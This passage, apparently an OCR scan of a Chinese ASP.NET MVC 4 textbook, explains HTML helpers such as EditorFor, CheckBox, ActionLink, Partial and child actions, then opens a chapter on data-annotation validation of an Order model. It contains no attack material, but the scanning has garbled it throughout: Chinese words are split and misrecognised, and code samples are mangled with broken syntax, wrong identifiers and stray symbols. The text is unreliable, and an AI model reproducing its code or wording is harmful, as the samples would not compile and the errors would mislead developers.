提供 了 足够 的 信息 ， 使 其 能 直接 读 取 模 型 的 Title 属性 来 获取 需要 的 值 。 
5.2.8 辅助 方法 和 模型 元 数据 

辅助 方法 不 仅 查 看 ViewData 内 部 的 数据 ; 它们 也 利用 可 得 到 的 模型 元 数据 。 例 如 ， 
专辑 编辑 表单 使 用 Label 辅助 方法 来 为 流派 选择 列表 显示 一 个 label 元 素 : 

QHtml .Label ("GenreId") 

这 个 辅助 方法 生成 如 下 HTML 标记 : 

<label for="Genreld">Genre</label> 

文本 Genre 从 哪里 来 的 呢 ?” 原 来 它 是 当 辅 助 方法 询问 运行 时 (runtime) 是 否 有 Genreld 
的 可 用 模型 元 数据 时 ， 运 行 时 从 装饰 Album 模型 的 DisplayName 特性 中 获取 的 信息 。 

[DisplayName ("Genre")]| 

public int Genreld { gets; set; } 

第 6 章 介 绍 的 数据 注解 对 很 多 辅助 方法 都 有 重大 影响 ， 原 因 在 于 当 辅 助 方法 构建 
HTML 时 要 用 到 注解 提供 的 元 数据 。 下 面 介绍 的 模板 辅助 方法 可 以 更 深入 地 利用 这 些 元 
5.2.9 ”模板 辅助 方法 


ASPNET MVC 中 的 模板 辅助 方法 利用 元 数据 和 模板 构建 HIML。 其 中 元 数据 包括 关于 模 
型 值 ( 它 的 名 称 和 类 型 ) 的 信息 和 (通过 数据 注解 或 自 定 义 提 供 器 添加 的 ) 模 型 元 数据 。 模 板 辅 助 方 
法 有 HtmlDisplay 和 Html.Editor， 以 及 分 别 与 它们 对 应 的 强 类 型 方法 Html.DisplayFor 和 
Html.EditorFor， 还 有 它们 对 应 的 完整 模型 Html.DisplayForModel 和 Html.EditorForModel。 
例如 Html.TextBoxFor 辅助 方法 为 某 个 专辑 的 Title 属性 生成 以 下 HIML 标记 : 


<input id="Title” name="Title" type="text™ 
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value="For Those About To Rock We Salute You™ /> 


如 果 不 使 用 Html.TextBoxFor 辅助 方法 ， 也 可 以 用 EditorFor 方法 取而代之 : 


QHtml .EditorFor (m => m.Title) 


尽管 两 种 方法 生成 的 是 同样 的 HTML 标记 ， 但 是 EditorFor 方法 可 以 通过 使 用 数据 注 
解 来 改变 生成 的 HTML。 顾 名 思 义 ， 从 辅助 方法 的 名 称 Editor 来 看 ， 就 知道 它 比 TextBox 
辅助 方法 (暗含 了 特定 类 型 的 输入 ) 应 用 广泛 。 当 使 用 模板 辅助 方法 时 ， 运 行 时 就 可 以 生成 
它 觉得 合适 的 任何 “编辑 器 ?。 下 面 要 在 Title 属性 上 添加 一 个 DataType 注解 : 

[Required (ErrorMessage = "An Album Title is TeGqdulred ) | 

[StringLength (160)1] 

[DataType (DataType .MultilineText)] 

public string Title { get; set; 上 


添加 之 后 ，EditorFor 辅助 方法 生成 如 下 HTML 标记 : 


<textarea class="text-—box multi-line™ id="Title™" name="Title™">» 
Let There Be ROCK 
</textarea> 


因为 是 在 一 般 意 义 上 请 求 一 个 编辑 器 ,所 以 EditorFor 辅助 方法 首先 查看 元 数据 ,然后 
推断 出 应 该 使 用 的 最 适合 HTML 元 素 是 textarea 元 素 ( 因 为 元 数据 指出 了 Title 属性 可 容纳 
多 行文 本 )。 当 然 ， 尽 管 一 些 艺术 家 推 肝 对 标题 的 这 一 限制 ， 但 是 大 部 分 专辑 标题 不 需要 多 
行 输入 。 

模板 辅助 方法 DisplayForModel 和 EditorForModel 都 是 为 整个 模型 对 象 构 建 HIML 的 。 
使 用 这 些 辅助 方法 ， 可 以 为 一 个 模型 对 象 添加 新 属性 ， 并 且 在 不 再 要 对 视图 做 任何 修改 的 
情况 下 立即 在 UI 中 查看 修改 后 的 效果 。 

通过 编写 目 定 义 的 显示 或 编辑 模板 可 控制 一 个 模板 辅助 方法 的 输出 (可 参阅 第 15 章 )。 
5.2.10 ”辅助 万 法 和 ModelState 


用 来 显示 表单 值 的 所 有 辅助 方法 也 需要 与 ModelState 交互 。 要 记 住 ，ModelState 是 模 
型 绑 定 的 副产品 ， 并 且 存 储 模 型 绑 定 期 间 检 测 到 的 所 有 验证 错误 ， 以 及 用 户 提 交 用 来 更 新 
模型 的 原始 值 。 

用 来 泻 染 表单 字段 的 辅助 方法 自动 在 ModelState 字典 中 查找 它们 的 当前 值 。 辅 助 方法 
使 用 名 称 表达 式 作 为 键 , 在 ModelState 字典 中 进行 查找。 如 果 碍 找 的 值 已 在 ModelState 中 ， 
辅助 方法 就 用 ModelState 中 的 值 奉 换 视图 数据 中 的 当前 值 。 

模型 绑 定 失败 后 , ModelState 查找 表 中 允许 保存 “ 坏 ” 值 。 例 如， 如果 用 户 向 DateTime 
属性 的 编辑 器 中 输入 值 “abc”， 模 型 绑 定 就 会 失败 ， 并 且 “abc” 也 会 保存 在 模型 状态 的 相 
关 属 性 中 。 为 了 在 用 户 修改 验证 错误 而 重新 泻 染 视 图 时 ,“abc” 值 依然 出 现在 DateTime 
编辑 器 中 ， 可 让 用 户 看 到 刚才 尝试 的 错误 文本 并 允许 他 们 改正 错误 。 

当 ModelState 包含 某 个 属性 的 错误 时 ， 与 错误 相关 的 表单 辅助 方法 除了 显 式 地 泻 染 指 
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定 的 CSS 类 之 外 ， 还 会 演 染 input-validation-error CSS 类 。 项 目 模 板 包 含 的 默认 样式 表 
style.css 中 包含 了 类 input-validation-error 的 样式 。 


5.3 ”其 他 输入 辅助 方法 


除了 前 面 已 经 谈 到 的 输入 辅助 方法 (如 TextBox 和 DropDownLisb 之 外 ，ASPNET MVC 
框架 还 包含 许多 其 他 的 辅助 方法 ， 它 们 涵盖 所 有 的 输入 控件 。 
5.3.1 Html.Hidden 

Html.Hidden 辅助 方法 用 于 泻 染 隐 藏 的 输入 元 素 。 例 如 ， 下 面 这 行 代 码 : 

QHtml .Hidden ("wizardstep", "1") 

会 生成 如 下 所 示 的 HTML 标记 : 

<input id="wizardSstep" name="wizardSstep" type="hidden" value="]1" /> 

这 个 辅助 方法 的 强 类 型 版 本 是 Html.HiddenFor。 如 果 模 型 有 一 个 WizardStep 属性 ， 就 
可 以 像 下 面 这 样 使 用 它 : 

QHtml .HiddenFor (m => m.Wizardstep) 
5.3.2 Html.Password 

Html.Password 辅助 方法 用 于 泻 染 密码 字段 。 它 除了 不 保留 提交 值 , 显示 密码 掩 码 之 外 ， 
基本 上 与 TextBox 辅助 方法 一 样 。 下 面 的 代码 : 

QHtml .Password("UseTrPassWwWord") 

会 生成 : 

<input id="UserPassword" name="UserPassword" type="password™” value="" /> 

下 如 预料 的 那样 ，Html.Password 的 强 类 型 方法 是 Html.PasswordFor。 下 和 耐 的 代码 展示 
了 如 何 使 用 它 来 显示 UserPassword 属性 : 


QHtml .PasswordFor (m => m.UserPassword) 
5.3.3 Html.RadioButton 


单 选 按钮 一 般 都 组 合 在 一 起 使 用 ， 为 用 户 的 单项 选择 提供 一 组 可 选项 。 例 如 ， 有 一 个 
功能 要 让 用 户 从 一 个 特定 的 颜色 列表 中 选择 一 种 颜色 ， 就 可 以 使 用 多 个 单 选 按钮 来 表示 这 
些 颜 色 选 项 。 对 于 同一 组 中 的 单 选 按钮 ， 可 以 给 所 有 按钮 相同 名 称 。 最 后 当 提 交 表 单 时 ， 
只 有 选择 的 单 选 按钮 会 发 送 到 服务 器 。 

下 面 代 码 竹 示 了 使 用 Html.RadioButton 辅助 方法 演 染 一 组 简单 的 单 选 按钮 ; 
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QHtml .RadioButton ("color™", "red"™) 
QHtml .RadioButton ("color™", "blue™", true) 
QHtml .RadioButton ("color", "green"™) 


生成 的 HTML 标记 如 下 : 

<input id="color™" name="color™" type="radio™ value="red™" /> 

<input checked="checked™ id="color" name="color" type="radio" value="blue" /> 

<input id="color™" name="color" type="radio™" value="green™" /> 

Html.RadioButton 有 一 个 强 类 型 的 对 应 方法 Html.RadioButtonFor。 强 类 型 方法 不 使 用 
名 称 和 值 ， 而 是 用 表达 式 来 标识 那些 包含 有 要 泻 染 属性 的 对 象 ， 当 用 户 选择 单 选 按钮 时 ， 
后 面 会 跟 要 提交 的 值 : 

daHtml .RadioButtonFor(m => m.GenreId, "1") Rock 


QHtml .RadioButtonFor (m => m.GenreId, "2") Jazz 
QHtml .RadioButtonFor (Im => m.GenreId, "3") Pop 


5.3.4 Html.CheckBox 

CheckBox 辅助 方法 是 唯一 一 个 泻 染 两 个 输入 元 素 的 辅助 方法 。 以 下 面 的 代码 为 例 : 

QHtml .CheckBox ("IsDiscounted") 

这 行 代 码 生成 的 HTML 标记 如 下 : 

<input id="IsDiscounted™" name="IsDiscounted" type="checkbox™" value="true™" /> 

<input name="IsDiscounted™" type="hidden™" value="false"™" /> 

看 到 上 面 生成 的 HTML 标记 ， 我 们 可 能 会 产生 一 个 疑问 : 除了 checkbox 的 输入 元 素 
之 外 ，CheckBox 辅助 方法 为 什么 还 要 演 染 男 一 个 隐藏 的 输入 元 素 。 其 实 ， 它 泻 染 两 个 输入 
元 素 的 主要 原因 是 ，HTML 规范 中 规定 浏览 副 只 提交 “ 开 ”( 即 选中 的 ) 的 复 选 框 的 值 。 在 
这 个 例子 中 ， 第 二 个 隐藏 输入 元 素 就 保证 了 IsDiscounted 有 一 个 值 会 被 提交 ， 即 便 用 户 没 

尽管 许多 辅助 方法 专注 于 构建 表单 和 表单 输入 元 素 ， 但 在 一 般 的 泻 染 场 合 中 还 是 存在 
可 用 辅助 方法 的 。 


5.4 演 染 辅助 方法 


泻 染 辅助 方法 可 在 应 用 程序 中 生成 指向 其 他 资源 的 链接 ， 也 可 以 构建 被 称 为 部 分 视图 
的 可 重用 UI 片段 。 
54.1 Html.ActionLink 和 Html.RouteLink 

ActionLink 辅助 方法 能 够 演 染 一 个 超 链接 ( 销 标 签 )， 演 染 的 链接 指 问 男 一 个 控制 费 操 
作 。 与 前 面 看 到 的 BeginForm 辅助 方法 一 样 ，ActionLink 辅助 方法 在 后 台 使 用 路 由 API 来 
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生成 URL。 例 如 ， 当 链接 的 操作 所 在 控制 器 与 用 来 演 染 当前 视图 的 控制 器 一 样 时 ， 只 需 
定 操作 的 名 称 ; 


QHtml .有 ActionLiInk("Link Text", "AnotherAction") 


这 里 假设 采用 的 是 默认 路 由 ， 那 么 这 行 代码 就 会 生成 如 下 所 示 的 HTML 标记 : 


<a href="/Home/AnotherAction" >LinkText</a> 


当 需 要 一 个 指向 不 同 控制 器 操作 的 链接 时 ， 可 通过 ActionLink 方法 的 第 三 个 参数 来 指 
定 控制 器 名 称 。 人 例如， 要 链接 到 ShoppingCartController 控制 器 的 Index 操作 ， 可 以 使 用 下 
面 的 代码 : 


QHtml .ActionLink("Link Text", "Index", "ShoppingCart") 


注意 上 面 指定 的 控制 器 名 称 中 没有 Controller 后 级 ， 也 就 是 说 没有 指定 控制 器 的 类 型 
名 称 。 但 ActionLink 方法 能 够 知道 这 是 一 个 控制 器 名 称 ， 因 为 它 有 足够 的 关于 ASPNET 
MVC 控制 器 和 操作 的 知识 ， 刚 才 已 经 看 到 ， 这 些 辅助 方法 提供 的 重 载 版 本 允许 只 指定 操 
作 名 称 ， 或 者 同时 指定 控制 器 名 称 和 操作 名 称 。 

在 很 多 应 用 场合 中 ， 路 由 参数 的 数量 会 超过 ActionLink 方法 重 载 版 本 的 处 理 能 力 。 例 
如 ， 可 能 需要 在 路 由 中 传递 一 个 ID 值 ， 或 者 应 用 程序 的 其 他 一 些 特定 路 由 参数 。 显 而 易 

， 内 置 的 ActionLink 辅助 方法 没有 提供 处 理 这 些 情形 的 重 载 版 本 。 

但 是 ， 我 们 可 以 通过 使 用 其 他 ActionLink 重 载 版 本 ， 来 癌 辅助 方法 提供 所 必需 的 路 由 
值 。 其 中 有 一 个 版 本 允许 回 它 传递 一 个 RouteValueDictionary 类 型 的 对 象 ; 男 一 个 版 本 允许 
给 routeValues 参数 传递 一 个 对 象 (通常 是 匿名 类 型 的 )。 运 行 时 会 查看 该 对 象 的 属性 并 使 用 
它们 来 构建 路 由 值 (属性 名 称 就 是 路 由 参数 的 名 称 ， 属 性 值 代表 路 由 参数 的 值 )。 例 如 ， 构 
建 一 个 指向 ID 号 为 10720 的 专辑 编辑 页 面 的 链接 ， 我 们 可 以 使 用 如 下 所 示 的 代码 : 


QHtml .ActionLink ("Edit link text™", "Edit", "StoreManager", new {id=10720}, null) 


上 述 重 载 方 法 的 最 后 一 个 参数 是 htmlAttributes。 在 本 章 前 面部 分 已 经 讲解 了 如 何 使 用 
这 个 参数 设置 HIML 元 素 上 的 特性 值 。 上 面 代 码 传递 了 一 个 null( 实 际 上 没有 设置 HTML 
元 素 上 的 任何 特性 值 )。 尽 管 上 面 的 代码 未 设置 任何 特性 , 但 是 为 了 调用 ActionLink 这 个 重 
载 方法 ， 必 须 给 这 个 参数 传递 一 个 值 。 

尽管 RouteLink 辅助 方法 和 ActionLink 辅助 方法 坦 循 相同 的 模式 ， 但 是 RouteLink 只 
可 以 接收 路 由 名 称 ， 而 不 能 接收 控制 旧名 称 和 操作 名 称 。 例 如 ， 演 示 ActionLink 的 第 一 个 
例子 也 可 以 用 下 面 的 代码 实现 ; 


QHtml .RouteLink ("Link Text"，new {action="AnotherAction"™}) 
5.4.2 URL 辅助 方法 


URL 辅助 方法 与 HTML 的 ActionLink 和 RouteLink 辅助 方法 相似 ,但 它 不 是 以 HTML 
标记 的 形式 返回 构建 的 URL，, 而 是 以 字符 串 的 形式 返回 这 些 URL。 对 此 , 有 三 个 辅助 方法 : 
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® Action 
® (Content 
® RouteUrl 
Action 辅助 方法 与 ActionLink 非常 相似 ， 但 是 它 不 返回 锚 标 签 。 例 如 ， 下 面 的 代码 会 
显示 浏览 商店 里 所 有 Jazz 专辑 的 URL( 不 是 链接 ): 
<span> 


QUr]1 .Action ("Browse", "Store", new { genre = "Jazz™" }, null) 
</span> 


会 生成 如 下 所 示 的 HTML 标记 : 
<span> 
/Store/Browse?genre=JazZz 
</span> 
当 第 8 章 介 绍 Ajax 技术 时 ， 我 们 会 看 到 Action 方法 的 另 一 种 用 法 。 
RouteUrl 辅助 方法 与 Action 方法 遭 循 同 样 的 模式 ， 但 与 RouteLink 一 样 ， 它 只 接收 路 
由 名 称 ， 而 不 接收 控制 融 名 称 和 操作 和 名称。 
Content 辅助 方法 特别 有 用 ,因为 它 可 以 把 应 用 程序 的 相对 路 径 转 换 成 绝对 路 径 。 在 音 
乐 商 店 的 Layonut 视图 中 可 以 看 到 Content 辅助 方法 的 效果 : 


<SCript src="@Url.Content ("~/ScTripts/duery-1.5.1.min.]js")” 
type="text/jJavascript"></script> 


上 面 代码 在 传递 给 Content 辅助 方法 的 字符 串 前 面 使 用 波浪 线 作 为 第 一 个 学 付 ， 这 样 
无 论 应 用 程序 部 萤 在 什么 位 置 ， 辅 助 方 法 都 可 以 让 其 生成 指 回 正确 资源 的 URL( 这 里 可 以 
把 波浪 线 看 成 应 用 程序 的 根 目 录 )。 在 不 加 波浪 线 的 情况 下 ,如 果 在 目录 树 中 挪动 应 用 程序 
虚拟 目录 的 位 置 ， 生 成 的 URL 就 会 失效 。 

ASPNET MVC 4 使 用 的 是 Razor 的 第 二 个 版 本 ， 波 浪 号 当 出 现在 script、style 和 img 
元 素 的 src 特性 时 就 会 被 目 动 解析 。 在 不 影响 运行 效果 的 情况 下 ， 上 面 例子 代码 也 可 以 写 
成 如 下 形式 : 

<SCript src="~/Scripts/jquery-1.5.1.min.j]s" type="text/jJavascript"></script> 
5.4.3 Html.Partial 和 Html.RenderPartial 

Partial 辅助 方法 用 于 将 部 分 视图 泻 染 成 字符 串 。 通 常情 况 下 ， 部 分 视图 中 包含 多 个 在 
不 同 视 图 中 可 重复 使 用 的 标记 。Partial 方法 共有 4 个 重 载 版 本 ， 如 下 所 示 : 


public Vold Partial (string partialViewName)}); 

public void Partial (string partialViewName, object model)}); 

public void Partial (string partialViewName, ViewDataDictionary viewData); 

public void Partial (string partialViewName, object model., 
ViewDataDictionary viewData).; 
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注意 这 里 没 必要 为 视图 指定 路 人 径 和 文件 扩展 名 ， 因 为 运行 时 定位 部 分 视图 与 定位 正常 
视图 使 用 的 逻辑 相同 。 例如， 下 向 代 人 码 就 泻 染 一 个 名 为 AlbumDisplay 的 部 分 视图 。 运 行 时 
使 用 所 有 的 可 用 视图 引擎 来 查找 : 


QHtm]l .Partial ("AlbumDisplay") 


RenderPartial 辅助 方法 与 Partial 非常 相似 ， 但 RenderPartial 不 是 返回 字符 串 ， 而 是 直 
接 写 入 啊 应 输出 流 。 出 于 这 个 原因 ， 必 须 把 RenderPartial 放 入 代码 块 中 ， 而 不 能 放 在 代码 
表达 式 中 。 为 了 说 明 这 一 点 ， 下 面 两 行 代 码 癌 输出 流 写 入 相同 的 内 容 : 

afHtml.RenaderPartial("AlLbumDisplay "); |】 

@Html .Partial ("AlbumDisplay ") 

这 里 ， 应 该 使 用 哪 一 个 方法 ，Partial 还 是 RenderPartial? 一 般 情 况 下 ， 因 为 Partial 相 
对 于 RenderPartial 来 说 更 方便 (不 必 使 用 花 括 与 将 调用 封装 在 代码 块 中 )， 所 以 应 该 选择 
Partial。 然 而 ，RenderPartial 拥有 较 好 的 性 能 ， 因 为 它 是 直接 写 入 啊 应 流 的 ， 但 这 种 性 能 优 
势 需 要 大 量 的 使 用 (高 的 网 站 流量 或 在 循环 中 重复 调用 ) 才 能 看 出 来 。 

5.4.4 Html.Action 和 Html.RenderAction 


Action 和 RenderAction 类 似 于 Partial 和 RenderPartial 辅助 方法 。Partial 辅助 方法 通常 
在 单独 的 文件 中 应 用 视图 标记 来 帮助 视图 泻 染 视图 模型 的 一 部 分 。 另 一 方面 ，Action 执行 
单独 的 控制 器 操作 ， 并 显示 结果 。Action 提供 了 更 多 的 灵活 性 和 重用 性 ， 因 为 控制 器 操作 
可 以 建立 不 同 的 模型 ， 可 以 利用 单独 的 控制 器 上 下 文 。 

同样 ，Action 和 RenderAction 之 间 仅 有 的 不 同 之 处 在 于 : RenderAction 可 以 直接 写 入 
啊 应 流 ( 这 可 以 市 来 微弱 的 效率 增益 )。 下 面 是 这 个 方法 用 法 的 价 单 介绍 。 假 设 现在 使 用 的 
是 如 下 的 控制 禹 : 

public class MyController : Controller 

public ActionResult Index() | 


return View(); 


} 


[ChildActiononlyl| 
public ActionResult Menul() | 
Var menu = GetMenuFromSomewhere () 
return PartialView (menu); 
} 
} 
Menu 操作 构建 一 个 菜单 模型 ， 并 返回 一 个 禹 有 呈 单 的 部 分 视图 : 
Gmodel Menu 
<ul> 


Gforeach (var item in Model.MenuItem) { 
<1i>R@item.Text</1i> 
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} 


</ul> 
在 Index.cshtml 视图 中 ， 可 以 调用 Menu 操作 来 显示 菜单 : 


<html> 

<head><title>Index with Menu</title></head> 

<body> 

QHtml .Action ("Menu™) 
<hl>Welcome to the Index View</hl1> 

</body> 

</html> 

注意 Menu 操作 使 用 了 ChildActionOnlyAttribute 特性 标记 。 这 个 特性 设置 可 有 效 避 人 免 
运行 时 直接 通过 URL 来 调用 Menu 操作 。 相 反 ， 只 能 通过 Action 或 RenderAction 方法 来 
调用 子 操作 。 虽 然 ChildActionOnlyAttribute 特性 不 是 必需 的 ， 但 通常 在 进行 子 操作 时 推荐 
使 用 。 

自 ASPNET MVC 3 开始 ， 在 ControllerContext 上 添加 了 一 个 新 属性 ， 它 的 名 称 是 
IsChildAction。 当 通过 Action 或 RenderAction 方法 调用 操作 时 ， 它 的 值 就 为 tue;， 当 通 过 一 个 
URL 调用 时 ， 它 的 值 就 为 false。ASPNET MVC 运行 时 的 一 些 操 作 过 滤器 与 子 操作 是 不 同 的 ， 
比如 AuthorizeAttribute 和 OutputCacheAttribute。 


1. 给 RenderAction 传递 值 


因为 这 些 操作 辅助 方法 调用 的 是 操作 方法 ， 所 以 我 们 可 以 指定 目标 操作 的 一 些 额外 值 
作为 参数 。 例 如 ， 假 设 现在 想 向 菜单 中 添加 一 些 选项 。 

(1) 定义 新 类 MenuOptions， 代 码 如 下 : 

public class MenuOptions 1 


public int Width 1{ get;: sets; |] 
public int Height 1{ get; set; } 


} 
(2) 修改 Menu 操作 方法 ， 使 其 可 以 作为 参数 接收 MenuOptions 对 象 : 
[ChildActiononlyl] 


public ActionResult Menu (MenuoOptions options) | 
return PartialView (options);} 


} 
(3) 在 视图 中 可 以 通过 Action 调用 传 进 沫 单 选项 ， 代 码 如 下 所 未 : 


QHtml .Action("Menu"，ew 1 
options = new MenuOptions { Width=400, Heijght=500 } }) 


2. 与 ActionName 特性 结合 使 用 


需要 注意 的 另 一 点 是 ，RenderAction 方法 优先 使 用 ActionName 特性 值 作为 要 调用 
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的 操作 名 称 。 如 果 按照 下 面 的 方式 注解 操作 ， 那 么 当 调用 RenderAction 方法 时 ， 需 要 确保 
操作 的 名 称 是 CoolMennu 而 不 是 Menu。 

[ChildActiononlyl] 

[ActionName ("CoolMenu")| 

public ActionResult Menu (MenuOptions options) | 


return PartialView (options); 


} 
5.5 ”小结 


章 首 先 介 绍 了 如 何 为 Web 应 用 程序 构建 表单 ， 而 后 讲解 了 如 何 使 用 ASPNET MVC 
框架 中 带 有 的 ， 并 且 与 表单 和 演 染 相关 的 HTML 辅助 方法 。 这 些 辅助 方法 的 目标 并 不 是 
“ 拿 走 ” 开 发 人 员 对 应 用 程序 标记 的 控制 权 。 相 反 ， 它 们 的 目标 是 ， 在 项 目 开发 过 程 中 ， 

保留 对 标记 的 完全 控制 权 的 同时 提高 开发 效率 。 
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本 章 主 要 内 容 

e 利用 数据 注解 进行 验证 

e 如 何 创建 目 定 义 的 验证 逻辑 
e 模型 元 数据 注解 的 用 法 


对 于 Web 开发 人 员 来 说 ,用 户 输 入 验证 一 直 是 一 个 挑战 。 不 仅 在 客户 端 浏 览 器 中 需要 
执行 验证 逻辑 ， 在 服务 器 端 也 需要 执行 。 客 户 端 验证 逻辑 会 对 用 户 向 表单 中 输入 的 数据 给 
出 一 个 即时 反馈 , 这 也 是 时 下 Web 应 用 程序 所 期 望 的 特性 ,之 所 以 需要 服务 器 端 验 证 迪 辑 ， 
主要 是 因为 来 自 网 络 的 信息 都 是 不 能 信任 的 。 

然而 ， 一 旦 从 全 局 来 看 ， 就 会 发 现 罗 辑 仅 是 整个 验证 的 很 小 一 部 分 。 验 证 首先 需要 管 
理 用 户 友 好 (通常 是 本 地 化 ) 的 并 与 验证 逻辑 相关 的 错误 提示 消息 ; 当 验 证 失败 时 ， 再 把 这 
些 错 误 提示 消息 呈现 在 用 户 界 面 上 ， 当 然 还 要 向 用 户 提 供 从 验证 失败 中 恢复 的 机 制 。 

如 果 和 觉得 验证 是 令 人 望 而 生 国 的 老 杂 琐事 ， 那 么 值得 欣 感 的 是 ASPNET MVC 框架 可 
以 帮助 处 理 这 些 琐事 。 本 章 将 专注 于 讲解 ASPNET MVC 框架 验证 组 件 的 相关 知识 。 

当 在 ASPNET MVC 设计 模式 上 下 文中 谈论 验证 时 ， 主 要 关注 的 是 验证 模型 的 值 。 用 
户 输入 了 需要 的 值 吗 ? 是 要 求 范 围 内 的 值 吗 ? ASPNET MVC 验证 特性 可 以 帮助 我 们 验证 
模型 值 。 因 为 这 些 验证 特性 是 可 扩展 的 , 所 以 我 们 可 以 采用 任意 想 要 的 方式 构建 验证 模式 ， 
但 默认 方法 是 一 种 声明 式 验证 ， 它 采用 了 本 章 介绍 的 数据 注解 特性 。 

章 首 先 讲解 数据 注解 如 何 与 ASPNET MVC 框架 配合 工作 ， 然 后 介绍 注解 的 用 途 ， 
不 单单 局 限于 验证 这 一 方面 。 注 解 是 一 种 通用 机 制 ， 可 以 用 来 向 框架 注入 元 数据 ， 同 时 ， 
框架 不 只 驱动 元 数据 的 验证 ， 还 可 以 在 生成 显示 和 编辑 模型 的 HTML 标记 时 使 用 元 数据 。 
下 面 首先 介绍 一 下 验证 的 应 用 场合 。 
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6.1 为 验证 注解 订单 


在 MVC Mnusic Store 购买 音乐 的 顾客 会 有 一 个 典型 的 购物 车 结算 环节 。 这 个 环节 需要 
付 球 和 收 货 信 息 。Order 类 中 包含 了 应 用 程序 完成 结算 环节 所 需要 的 所 有 人 信息， 代码 如 下 
所 示 : 


public class Order 


public int Orderld 1{ get; set; | 
public DateTime OrderDate { get; set; |} 
public string Username 1{ get; set; |} 
public string FirstName 1{ get; set; 上 } 
public string LastName 1{ get; set; } 
public string Adaress 1{ get; set; } 
public string City 1{ get set; |} 
public string State { get set; } 
public string PostalCode { get; set; } 
Public string Country 1{ get; set; 上 } 
public string Phone 1{ get; set; } 


public string Email 1{ get; set; } 
public decimal Total { get; set; } 
public List<OrderDetail> OrderDetails { get; set; 上 


Order 类 的 一 些 属 性 需要 由 顾客 直接 输入 (如 FirstName 和 LastName 属性 )， 但 对 于 其 
他 属性 的 值 ， 应 用 程序 可 以 通过 其 他 方式 获得 ， 例 如 从 运行 环境 中 获得 或 从 数据 库 中 和 奉 
找 ( 如 Username 属性 ， 由 于 顾客 在 结算 之 前 必定 已 经 登录 系统 ， 因 此 运行 环境 中 已 经 有 这 
个 值 了 )。 

应 用 程序 使 用 HTML 辅助 方法 EditorForModel 来 构建 结算 页 耐 。 下 而 是 Views/Checkout 
文件 夹 中 视图 文件 AddressandPayment.cshtml 中 的 部 分 代码 : 

<fieldset> 

<legend>shipping Information</legend> 


QHtml .EditorForModel () 
</fieldset> 


EditorForModel 辅助 方法 为 模型 对 象 的 每 个 属性 构建 一 个 编辑 器 , 生成 的 表单 如 图 6-1 
所 示 。 

这 个 表单 存在 一 些 明 显 问 题 。 比 如 图 6-1 中 显示 出 的 OrderId 和 OrderDate 编辑 嚣 ， 这 
些 属性 值 并 不 需要 顾客 填写 ， 应 用 程序 会 在 服务 右 端 设置 。 同 样 ， 输 入 框 上 耐 的 标签 名 对 
程序 员 来 说 有 一 定 的 意义 (FirstName 显然 是 个 属性 名 )， 但 顾客 面 对 这 个 标签 时 ， 就 会 理 
不 清 头 绪 ( 难 道 某 个 开发 人 员 的 空格 键 坏 了 吗 )， 本 章 后 面 会 讲解 这 些 问 题 的 解决 方法 。 


第 6 章 数据 注解 和 验证 


全 (> 省 localhost26641/home/edii ‘” (9 
GBS Home store Cart(0) Admin 
ASP.NET MVC MUSIC STORE 
Rock Ed 


Orderld 
0 


OrderDate 
W10004 12:00:00 ANM 


Lc 
Metal Usemame 


Te ] 


Regrae FirstName 
LastName 
| 
Address 
ci 
图 6-1 


MVC 4 和 HTML 5 

MVC 4 中 的 HTML 辅助 方法 使 用 HTML 5 的 输入 类 型 。 在 上 图 中 ， 我 们 可 以 看 出 这 
一 点 ， 因 为 OrderID 和 OrderDate 与 页 面 上 的 其 他 输入 元 素 相 比 ， 在 外 观 上 稍 有 不 同 。 这 
是 因为 MVC 4 使 用 数字 类 型 来 泻 染 OrderID， 使 用 日 期 类 型 来 泻 染 OrderDate。 尽 管 最 终 
不 想 让 这 些 输入 元 素 出 现在 页 面 上 ， 但 它 可 以 展示 MVC 4 如 何 泻 染 这 些 输入 元 素 ， 浏 览 
峰 ( 比 如 Google Chrome) 如 何 根据 输入 类 型 添加 不 同 功 能 和 验证 逻辑 。 


在 图 6-1 中 还 有 个 更 严重 但 不 容易 发 现 的 问题 ， 顾 客 可 以 在 完全 没有 填写 表单 的 情况 
下 单 击 表单 底部 的 Submit Order 按钮 ， 应 用 程序 也 不 会 提醒 他 们 必须 提供 像 姓 名 和 地 址 这 
样 非常 重要 的 信息 。 下 面 介 绍 的 数据 注解 功能 将 会 很 好 地 解决 这 些 问题 。 
6.1.1 验证 注解 的 使 用 

数据 注解 特性 定义 在 名 称 空间 System.ComponentModel.DataAnnotations 中 (但 接 下 来 
就 会 看 到 ， 有 些 特 性 不 在 这 个 名 称 空 间 中 定义 )。 它 们 提供 了 服务 器 端 验 证 的 功能 ， 当 在 模 
型 的 属性 上 使 用 这 些 特性 时 ， 框 架 也 支持 客户 端 验 证 。 在 名 称 空 间 DataAnnotations 中 ， 有 
4 个 特性 可 以 用 来 应 对 一 般 的 验证 场合 。 下 和 面 从 Required 特性 开始 对 它们 逐一 介绍 。 


1. Required 
因为 顾客 的 姓氏 和 名 宇都 是 必 再 的 ,所 以 需要 在 模型 类 Order 的 FirstName 和 LastName 
属性 上 面 添加 Required 特性 : 


[Required] 
Public string FirstName 1{ get; set; } 
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[Required] 

public string LastName 1{ get; set; } 

当 这 两 个 属性 中 的 一 个 是 null 或 空 时 , Required 特性 将 会 引发 一 个 验证 错误 ( 稍 后 介绍 
如 何 处 理 验 证 错误 )。 

与 所 有 内 置 的 验证 特性 一 样 ，Required 特性 既 传递 服务 器 端 验 证 逻辑 也 传递 客户 端的 
验证 逻辑 (尽管 在 MVC 框 保 内 部 是 为 一 个 组 件 通 过 设计 一 个 验证 适 配 费 来 传递 该 特性 的 客 
户 端 验证 逻辑 )。 

添加 该 特性 后 ， 如 果 顾 客 在 没有 填写 姓氏 的 情况 下 提交 表单 ， 束 会 出 现 图 6-2 所 示 的 
矢 认 错误 提示 消息 。 


FirstName 


LastName 


The LastName field is requyired 


图 6-2 


然而 ， 即 使 顾客 在 客户 冯 的 浏览 堪 中 没有 设置 允许 JavaScript 执行 的 权限 ， 验 证 逻辑 
也 会 在 服务 器 端 捕获 到 一 个 空 名 属性 。 即 便 正 确 地 实现 了 控制 左 操 作 ( 稍 后 束 会 介绍 )， 顾 
客 也 还 是 会 看 到 图 6-2 所 示 截 图 中 显示 的 错误 提示 消 居 。 

2. StringLength 


现在 已 经 要 求 顾客 必须 输入 名 字 ， 但 如 果 他 输入 了 一 个 非常 长 的 名 字 ， 该 怎么 处 理 
呢 ? Wikipedia 中 讲 到 ,名 字 最 长 的 是 费城 的 一 个 德 裔 排 字 工人 ,他 的 全 名 超过 了 500 个 字 
符 。 虽 然 NET 中 的 String 字符 串 理 论 上 可 以 存储 数 GB 的 Unicode 字符 , 但 MVC Music Store 
